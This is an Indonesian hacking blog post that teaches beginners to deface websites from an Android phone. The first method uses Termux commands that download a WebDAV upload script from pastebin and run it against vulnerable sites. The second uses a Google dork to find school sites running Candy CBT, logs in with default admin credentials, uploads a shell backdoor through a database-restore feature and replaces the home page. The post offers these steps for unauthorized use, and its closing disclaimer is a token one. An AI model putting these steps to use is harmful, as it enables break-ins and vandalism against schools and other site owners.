Rabu, 18 September 2019

Cara Deface Website Di Android Paling Mudah

Selamat datang kembali sobat bazengers di blog FHXploit! di postingan kita kali ini saya akan membahas tentang cara deface website di android yang paling gampang bahkan untuk pemula seperti saya pun bisa melakukanya.

banyak yang bertanya ke saya apakah melakukan deface web harus menggunakan pc? dan apakah spesifikasinya harus tinggi? tentu saja tidak karena kemampuan defacing ada pada skill bukan pada alatnya jadi tanpa komputerpun kalian masih bisa melakukan deface di android bahkan meskipun perangkat anda no root.

sebelumnya buat temen - temen yang belum tau tentang deface atau baru tau mengenai web deface di sini saya kasih penjelasan singkatnya dulu mengenai deface.

Deface atau web deface merupakan sebuah teknik untuk mengubah atau sebagian isi website secara tidak resmi atau tanpa izin pemiliknya, orang yang melakukan aksi deface merupakan defacer, biasanya para defacer hanya mmerubah tampilan indexnya saja atau halaman home page nya kemudian menggantinya dengan script dia sendiri.

sebenarnya ada banyak metode yang dapat di lakukan untuk mendeface sebuah website namun di sini saya hanya akan membahas teknik yang paling mudah dan paling banyak orang ingin tau yaitu teknik webdav menggunakan termux dan juga bypass admin login yang akan kita praktekan pada website sekolah.

baiklah langsung saja kita masuk ke tutorial 2 cara deface website menggunakan android

Deface Website Methode Webdav di Termux


sudah tidak asing lagi bahwa termux memang sangat berguna sekali untuk perlengkapan hacking, bukan hanya itu termux juga bisa di gunakan untuk melakukan deface menggunkan methode webdav, silahkan simak langkah - langkah berikut ini.

Download dulu script defacenya : di sini

buka aplikasi termux kemudian jalankan perintah di bawah dengan urut

$cd /storege/emulate/0
$apt install wget
$apt install python
$apt install libcurl
$apt install openssl curl
$pip2 install urllib3 
$pip2 install utllib3 chardet certifi idna requests
$mkdir webdav
$cd webdav 
$wget https://pastebin.com/raw/HnVyQPtR -O webdav.py

silahkan cari script deface yang sudah kalian download tadi di file manager kemudian ganti ke folder webdav dan juga ubah namanya menjadi index.html

website di android termux

kemudian silahkan kalian cari webvuln webdav, kalo gk tau cara nyarinya kalian bisa cari di google atau download kumpulan webvuln webdav di sini

masuk kembali ke aplikasi termux kemudian masuk ke folder webdav dengan peritntah

$cd /sdcard/webdav

lalu jalankan webdavnya


$python2 webdav.py web_target index.html

cara deface di android termux

silahkan kalian isi web target dengan web vuln webdav yang sudah kalian cari atau download di atas, tekan enter kemudian biarkan proses upload berjalan dengan lancar, jika ada tulisan [Y/n] pilih y lalu enter

deface website di android tanpa aplikasi

untuk mengecek berhasil atau tidak silahkan kalian buka web yang sudah di targetkan tadi dengan browser, maka hasilnya akan seperti ini.

cara deface untuk pemula di android

dan taraa webnya sudah berhasil di tebas :D

selanjutnaya kita masuk ke teknik yang ke dua, di sini kita akan mencoba untuk deface website sekolah yang berdomain .sch.id, di sini kita akan menggunakan cara yang paling mudah yaitu dengan teknik bypass admin yang bisa kalian lakukan di android tanpa aplikasi.

Cara Deface Website Sekolah


pertama silahkan kalian siapkan script defacenya kalian bisa buat sendiri atau download di google juga banyak.

yang kedua adalah siapkan dorknya silahkan kalian gunakan dork di bawah

intext:"support by candy cbt" site:.sch.id

ketikan dork tersebut di google nanti akan keluar daftar situs sekolah

cara deface web target di android

silahkan kalian pilih website sekolah yang sekiranya vuln. pastikan kalian berada pada halaman login admin,  jika belum ada kalian bisa tambahkan sendiri seperti situs.sch.id/admin/login.php

deface web sekolah

setelah halaman login muncul, isikan username admin dan juga password admin

tutorial deface website untuk pemula

kalo webnya emang vuln maka kalian akan langsung masuk ke halaman dashboard.

deface lewat android tanpa root

silahkan kalian masuk ke pengaturan, lalu cari restore database, kemudian kalian upload shell backdoor kalian

deface webdav termux

stelah terupload klik restore
setelah itu buka shell backdoor kalian misal berada di situs.sch.id/candy/admin/shell.php

cara hack website menggunakan termux

masuk ke bagian public_html kemudian hapus file index.php

cara hack website sekolah dengan termuxscript deface web termux

selanjutnya silahkan kaian upload scrip deface kalian jangan lupa nama script defacenya ubah menjadi index.php atau index.html

deface situs lewat termux

setelah script deface kalian selesai terupload silahkan kalian buka web terget di browser jika berhasil maka tampilan halaman depanya akan berubah menjadi script kalian.


demikan tutorial cara deface website untuk pemula yang bisa kalian terapkan di android root maupun no root menurut kalian gimana? lebih mudah yang menggunakan termux atau yang menggunakan dork? tulis pendapat kalian di komentar, sebaiknya teknik ini tidak di salah gunakan karena resiko di tanggung sendiri, semoga bermanfaat dan sampai jumpa di postingan berikutnya.

Terima Kasih Telah mengunjungi Blog FHXploit Bantu kami mengembangkan Channel Youtube dengan Subscribe di Channel FHXploit. Dan Jangan lupa terus kunjungi www.fhxploit.Com untuk melihat Artikel lainnya.
Klik Untuk BerKomentar

0 komentar

Paling Populer

Entri yang Diunggulkan

Pengertian root di OS Linux

Pengertian root di dalam OS Linux adalah sebuah pengguna atau user yang memiliki hak akses tertinggi di dalam OS linux tersebut, Biasanya s...